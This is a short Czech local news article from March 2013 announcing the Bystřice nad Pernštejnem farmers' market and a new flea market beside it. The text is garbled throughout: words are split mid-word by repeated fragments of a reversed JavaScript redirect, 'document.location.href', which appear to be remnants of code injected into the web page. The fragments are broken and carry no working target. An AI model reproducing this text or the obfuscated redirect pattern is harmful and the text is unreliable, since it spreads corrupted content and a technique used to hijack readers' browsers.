Bystřice nad Pernštejnem, bystrice nad pernstejnem, aktuality, trh, farmářské
Rainbow page separator

Farmářské trhy ozvláštní bleší trh

Sobota, 9. března 2013

Bystřice nad Pernštejnem / První le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošní farmářský trh se v sobotu 9. března uskuteční na bystřickém Masarykově náměstí. A [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to v dříve obvyklém čase, tedy od 8 hodin ráno do poledne.

V le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce budou na farmářských trzích preferováni místní výrobci a farmáři, k mání budou například čerstvé ovčí, kozí a kravské sýry, uzeniny, medovina i včelí produkty a řada dalších výrobků.

Od le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošního roku jsou tradiční bystřické farmářské trhy rozšířeny ještě o lidový bleší trh. Ten se uskuteční na parkovišti u kostela a zúčastnit se ho může kdokoliv, kdo se potřebuje zbavit něčeho pro něj již nepotřebného – živnostenský list v [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to případě není nutností. Jedná se například o obrazy, sběratelské zajímavosti či vojenské věci, nábytek a další podobný sortiment – co někomu doma překáží a jinému by naopak za pár korun mohlo ještě udělat radost.

Na bleším trhu není povoleno prodávat nové zboží zakoupené za účelem dalšího prodeje.